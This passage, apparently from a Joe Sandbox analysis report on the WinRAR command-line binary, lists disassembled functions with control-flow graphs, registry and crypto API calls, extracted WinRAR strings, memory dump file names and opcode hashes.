                                                                                                                                                                                                                                        Function 00007FF6AA194FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1405 7ff6aa194fd0-7ff6aa19502d call 7ff6aa1da5a0 1408 7ff6aa19502f-7ff6aa195037 1405->1408 1409 7ff6aa19504d-7ff6aa195055 1405->1409 1408->1409 1410 7ff6aa195039-7ff6aa19504b call 7ff6aa1dc8a0 1408->1410 1411 7ff6aa19506e-7ff6aa195089 call 7ff6aa1b420c 1409->1411 1412 7ff6aa195057-7ff6aa195069 call 7ff6aa19481c 1409->1412 1410->1409 1410->1412 1418 7ff6aa19509f-7ff6aa1950b6 call 7ff6aa1cdb08 1411->1418 1419 7ff6aa19508b-7ff6aa19509d call 7ff6aa1ca9c0 1411->1419 1412->1411 1424 7ff6aa19511b-7ff6aa195131 call 7ff6aa1dc8a0 1418->1424 1425 7ff6aa1950b8-7ff6aa1950c3 call 7ff6aa1ca59c 1418->1425 1419->1424 1430 7ff6aa195203-7ff6aa19520d call 7ff6aa1caa48 1424->1430 1431 7ff6aa195137-7ff6aa19513e 1424->1431 1425->1424 1432 7ff6aa1950c5-7ff6aa1950cf call 7ff6aa1a3054 1425->1432 1440 7ff6aa195212-7ff6aa19521c 1430->1440 1433 7ff6aa195140-7ff6aa195167 call 7ff6aa1b3f98 1431->1433 1434 7ff6aa19516c-7ff6aa1951be call 7ff6aa1caa1c call 7ff6aa1caa48 call 7ff6aa1c6e98 1431->1434 1432->1424 1441 7ff6aa1950d1-7ff6aa195107 call 7ff6aa1ca9e8 call 7ff6aa1ca9c0 call 7ff6aa1a3054 1432->1441 1433->1434 1497 7ff6aa1951d3-7ff6aa1951e8 call 7ff6aa1c7a24 1434->1497 1443 7ff6aa195222 1440->1443 1444 7ff6aa1952db-7ff6aa1952e0 1440->1444 1441->1424 1522 7ff6aa195109-7ff6aa195116 call 7ff6aa1ca9e8 1441->1522 1449 7ff6aa19532f-7ff6aa195332 1443->1449 1450 7ff6aa195228-7ff6aa19522d 1443->1450 1445 7ff6aa195453-7ff6aa195477 call 7ff6aa19f00c call 7ff6aa19f230 call 7ff6aa19f09c 1444->1445 1446 7ff6aa1952e6-7ff6aa1952e9 1444->1446 1499 7ff6aa19547c-7ff6aa195483 1445->1499 1454 7ff6aa1952ef-7ff6aa1952f2 1446->1454 1455 7ff6aa195379-7ff6aa195382 1446->1455 1452 7ff6aa195334 1449->1452 1453 7ff6aa19533b-7ff6aa19533e 1449->1453 1450->1449 1458 7ff6aa195233-7ff6aa195236 1450->1458 1452->1453 1462 7ff6aa195340 1453->1462 1463 7ff6aa195347-7ff6aa195358 call 7ff6aa181230 call 7ff6aa184858 1453->1463 1464 7ff6aa1952f4-7ff6aa1952f7 1454->1464 1465 7ff6aa19536c-7ff6aa195374 call 7ff6aa1c81cc 1454->1465 1460 7ff6aa195388-7ff6aa19538b 1455->1460 1461 7ff6aa195449-7ff6aa195451 call 7ff6aa1beab8 1455->1461 1468 7ff6aa195290-7ff6aa195299 1458->1468 1469 7ff6aa195238-7ff6aa19523b 1458->1469 1475 7ff6aa195391-7ff6aa195397 1460->1475 1476 7ff6aa19541b-7ff6aa195433 call 7ff6aa1cab1c 1460->1476 1461->1499 1462->1463 1530 7ff6aa19535d 1463->1530 1464->1445 1478 7ff6aa1952fd-7ff6aa195300 1464->1478 1465->1499 1480 7ff6aa1952b2-7ff6aa1952bd 1468->1480 1481 7ff6aa19529b-7ff6aa19529e 1468->1481 1470 7ff6aa195274-7ff6aa19528b call 7ff6aa181230 call 7ff6aa1848ec 1469->1470 1471 7ff6aa19523d-7ff6aa195240 1469->1471 1546 7ff6aa19535e-7ff6aa195362 call 7ff6aa1814fc 1470->1546 1471->1445 1492 7ff6aa195246-7ff6aa195249 1471->1492 1488 7ff6aa195399-7ff6aa19539c 1475->1488 1489 7ff6aa19540c-7ff6aa195419 call 7ff6aa1b54f8 call 7ff6aa1b51e4 1475->1489 1476->1499 1529 7ff6aa195435-7ff6aa195447 call 7ff6aa1bbbd4 1476->1529 1478->1449 1490 7ff6aa195302-7ff6aa195305 1478->1490 1484 7ff6aa1952ce-7ff6aa1952d6 call 7ff6aa1b55e0 1480->1484 1485 7ff6aa1952bf-7ff6aa1952c9 call 7ff6aa1ca9e8 1480->1485 1481->1484 1496 7ff6aa1952a0-7ff6aa1952a6 1481->1496 1484->1499 1485->1484 1503 7ff6aa19539e-7ff6aa1953a1 1488->1503 1504 7ff6aa1953ef-7ff6aa195401 call 7ff6aa1945c8 1488->1504 1489->1499 1505 7ff6aa195322-7ff6aa19532a call 7ff6aa1a67e0 1490->1505 1506 7ff6aa195307-7ff6aa19530a 1490->1506 1492->1449 1508 7ff6aa19524f-7ff6aa195252 1492->1508 1513 7ff6aa195313-7ff6aa19531d call 7ff6aa19481c 1496->1513 1514 7ff6aa1952a8-7ff6aa1952ad call 7ff6aa197214 1496->1514 1532 7ff6aa1951c0-7ff6aa1951ce call 7ff6aa1caa48 1497->1532 1533 7ff6aa1951ea-7ff6aa195201 call 7ff6aa1c6f68 call 7ff6aa1814c0 1497->1533 1519 7ff6aa195491-7ff6aa1954bc call 7ff6aa1da610 1499->1519 1520 7ff6aa195485-7ff6aa19548c call 7ff6aa198444 1499->1520 1503->1513 1518 7ff6aa1953a7-7ff6aa1953d5 call 7ff6aa1945c8 call 7ff6aa1cab1c 1503->1518 1504->1489 1505->1499 1506->1445 1521 7ff6aa195310 1506->1521 1508->1445 1525 7ff6aa195258-7ff6aa19525b 1508->1525 1513->1499 1514->1499 1518->1499 1561 7ff6aa1953db-7ff6aa1953ea call 7ff6aa1bba9c 1518->1561 1520->1519 1521->1513 1522->1424 1540 7ff6aa19526b-7ff6aa195272 1525->1540 1541 7ff6aa19525d-7ff6aa195260 1525->1541 1529->1499 1530->1546 1532->1497 1533->1440 1540->1484 1541->1505 1553 7ff6aa195266 1541->1553 1555 7ff6aa195367 1546->1555 1553->1521 1555->1499 1561->1499
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: wcschr
                                                                                                                                                                                                                                        • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                        • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                        • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                        • Instruction ID: 6ecca37bedf4c57e258ac0f0552123388204c5784dd045750a7e5eeb0343d54f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22C1B621A0A582E0EA67AF34CA511FC1355AF45798F4841B7DA4EDB6DADE2CEE07C300
                                                                                                                                                                                                                                        Function 00007FF6AA1C7F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1564 7ff6aa1c7f24-7ff6aa1c7f5c 1565 7ff6aa1c7fd0 1564->1565 1566 7ff6aa1c7f5e-7ff6aa1c7f64 1564->1566 1567 7ff6aa1c7fd7-7ff6aa1c7fea 1565->1567 1566->1565 1568 7ff6aa1c7f66-7ff6aa1c7f7c call 7ff6aa1cb3f0 1566->1568 1569 7ff6aa1c8036-7ff6aa1c8039 1567->1569 1570 7ff6aa1c7fec-7ff6aa1c7fef 1567->1570 1576 7ff6aa1c7f7e-7ff6aa1c7fb3 GetProcAddressForCaller GetProcAddress 1568->1576 1577 7ff6aa1c7fb5 1568->1577 1572 7ff6aa1c805c-7ff6aa1c8065 GetCurrentProcessId 1569->1572 1573 7ff6aa1c803b-7ff6aa1c804a 1569->1573 1570->1572 1574 7ff6aa1c7ff1-7ff6aa1c8000 1570->1574 1578 7ff6aa1c8077-7ff6aa1c8093 1572->1578 1579 7ff6aa1c8067 1572->1579 1584 7ff6aa1c804f-7ff6aa1c8051 1573->1584 1585 7ff6aa1c8005-7ff6aa1c8007 1574->1585 1580 7ff6aa1c7fbc-7ff6aa1c7fce 1576->1580 1577->1580 1583 7ff6aa1c8069-7ff6aa1c8075 1579->1583 1580->1567 1583->1578 1583->1583 1584->1578 1586 7ff6aa1c8053-7ff6aa1c805a 1584->1586 1585->1578 1587 7ff6aa1c8009 1585->1587 1588 7ff6aa1c8010-7ff6aa1c8034 call 7ff6aa19ca6c call 7ff6aa19cda4 call 7ff6aa19ca40 1586->1588 1587->1588 1588->1578
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                        • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                        • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                        • Instruction ID: 0a3e194f6cebac5f86c1304ccc162319d4eaa3fa86236cde3163cde75b4a1548
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76417C24A0AA82E1FA429F12AE4097967A0BF45BD4F4901F7CC6D877A4DE7CF8579300
                                                                                                                                                                                                                                        Function 00007FF6AA1DB0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 552178382-0
                                                                                                                                                                                                                                        • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                        • Instruction ID: 1c977e5bb0b35cd39942883759b103812d53e898777c36dcbd471792b42d9054
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1314D11E0E283E5FA16AB24A5913B923D1AF55784F4400BBEA4ECB6D7DE6DEC07C240
                                                                                                                                                                                                                                        Function 00007FF6AA1C4774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C47DB
                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4831
                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4853
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C48A6
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                        • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                        • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                        • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                        • Instruction ID: 1ab10900c490c9293b5b8afe0d788f01cbe5f70176ae2d2f92c4d3707c3f4ed9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931E32271AA81E1EB51DF21E8052BE6351FF84794F404272EE4D87B99EF6CD906C700
                                                                                                                                                                                                                                        Function 00007FF6AA1B4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B43D1
                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B4402
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B440D
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B443E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                        • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                        • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                        • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                        • Instruction ID: f05980d9d83ed74343c6a0244310feb7ee911bea0e0dc0c4dd5936b9bcfca47a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72116F26619741E1EB529F21E8005A97360FF84BC4F445176EA4E43756EE3CD806C700
                                                                                                                                                                                                                                        Function 00007FF6AA187A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1715 7ff6aa187a5b-7ff6aa187a5e 1716 7ff6aa187a68 1715->1716 1717 7ff6aa187a60-7ff6aa187a66 1715->1717 1718 7ff6aa187a6b-7ff6aa187a7c 1716->1718 1717->1716 1717->1718 1719 7ff6aa187aa8 1718->1719 1720 7ff6aa187a7e-7ff6aa187a81 1718->1720 1721 7ff6aa187aab-7ff6aa187ab8 1719->1721 1722 7ff6aa187a88-7ff6aa187a8b 1720->1722 1723 7ff6aa187a83-7ff6aa187a86 1720->1723 1724 7ff6aa187aba-7ff6aa187abd 1721->1724 1725 7ff6aa187ac8-7ff6aa187acb 1721->1725 1726 7ff6aa187a8d-7ff6aa187a90 1722->1726 1727 7ff6aa187aa4-7ff6aa187aa6 1722->1727 1723->1719 1723->1722 1724->1725 1728 7ff6aa187abf-7ff6aa187ac6 1724->1728 1729 7ff6aa187acf-7ff6aa187ad1 1725->1729 1726->1719 1730 7ff6aa187a92-7ff6aa187a99 1726->1730 1727->1721 1728->1729 1731 7ff6aa187b2a-7ff6aa187bb0 call 7ff6aa1a1d34 call 7ff6aa183f04 1729->1731 1732 7ff6aa187ad3-7ff6aa187ae6 1729->1732 1730->1727 1733 7ff6aa187a9b-7ff6aa187aa2 1730->1733 1744 7ff6aa187bbc 1731->1744 1745 7ff6aa187bb2-7ff6aa187bba 1731->1745 1734 7ff6aa187b0a-7ff6aa187b27 1732->1734 1735 7ff6aa187ae8-7ff6aa187af2 call 7ff6aa199be0 1732->1735 1733->1719 1733->1727 1734->1731 1739 7ff6aa187af7-7ff6aa187b02 1735->1739 1739->1734 1746 7ff6aa187bbf-7ff6aa187bc9 1744->1746 1745->1744 1745->1746 1747 7ff6aa187bcb-7ff6aa187bd5 call 7ff6aa1a1e1c 1746->1747 1748 7ff6aa187bda-7ff6aa187c06 call 7ff6aa18b540 1746->1748 1747->1748 1752 7ff6aa187c08-7ff6aa187c0f 1748->1752 1753 7ff6aa187c40 1748->1753 1752->1753 1755 7ff6aa187c11-7ff6aa187c14 1752->1755 1754 7ff6aa187c44-7ff6aa187c5a call 7ff6aa18aa68 1753->1754 1760 7ff6aa187c5c-7ff6aa187c6a 1754->1760 1761 7ff6aa187c85-7ff6aa187c97 call 7ff6aa18b540 1754->1761 1755->1753 1757 7ff6aa187c16-7ff6aa187c2b 1755->1757 1757->1754 1759 7ff6aa187c2d-7ff6aa187c3e call 7ff6aa1d9b98 1757->1759 1759->1754 1760->1761 1764 7ff6aa187c6c-7ff6aa187c7e call 7ff6aa188d98 1760->1764 1767 7ff6aa187c9c-7ff6aa187c9f 1761->1767 1764->1761 1769 7ff6aa187ca5-7ff6aa187cfb call 7ff6aa1b9354 call 7ff6aa1a6378 * 2 1767->1769 1770 7ff6aa187fa4-7ff6aa187fbe 1767->1770 1777 7ff6aa187cfd-7ff6aa187d10 call 7ff6aa185414 1769->1777 1778 7ff6aa187d17-7ff6aa187d1f 1769->1778 1777->1778 1780 7ff6aa187d25-7ff6aa187d28 1778->1780 1781 7ff6aa187de2-7ff6aa187de6 1778->1781 1780->1781 1785 7ff6aa187d2e-7ff6aa187d36 1780->1785 1783 7ff6aa187de8-7ff6aa187e49 call 7ff6aa1b98dc 1781->1783 1784 7ff6aa187e4e-7ff6aa187e68 call 7ff6aa1b9958 1781->1784 1783->1784 1794 7ff6aa187e8b-7ff6aa187e8e 1784->1794 1795 7ff6aa187e6a-7ff6aa187e84 1784->1795 1788 7ff6aa187d59-7ff6aa187d6a call 7ff6aa1da444 1785->1788 1789 7ff6aa187d38-7ff6aa187d49 call 7ff6aa1da444 1785->1789 1797 7ff6aa187d6c-7ff6aa187d77 call 7ff6aa1acf8c 1788->1797 1798 7ff6aa187d78-7ff6aa187dc6 1788->1798 1801 7ff6aa187d4b-7ff6aa187d56 call 7ff6aa1a8ae8 1789->1801 1802 7ff6aa187d57 1789->1802 1799 7ff6aa187e90-7ff6aa187e9a call 7ff6aa1b9990 1794->1799 1800 7ff6aa187e9f-7ff6aa187eb8 call 7ff6aa181204 1794->1800 1795->1794 1797->1798 1798->1781 1823 7ff6aa187dc8-7ff6aa187de1 call 7ff6aa181314 call 7ff6aa1dba34 1798->1823 1799->1800 1812 7ff6aa187ec8-7ff6aa187ed9 call 7ff6aa1b941c 1800->1812 1801->1802 1802->1798 1817 7ff6aa187edb-7ff6aa187f9f call 7ff6aa181400 call 7ff6aa1a6424 call 7ff6aa18b540 1812->1817 1818 7ff6aa187eba-7ff6aa187ec3 call 7ff6aa1b9680 1812->1818 1817->1770 1818->1812 1823->1781
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
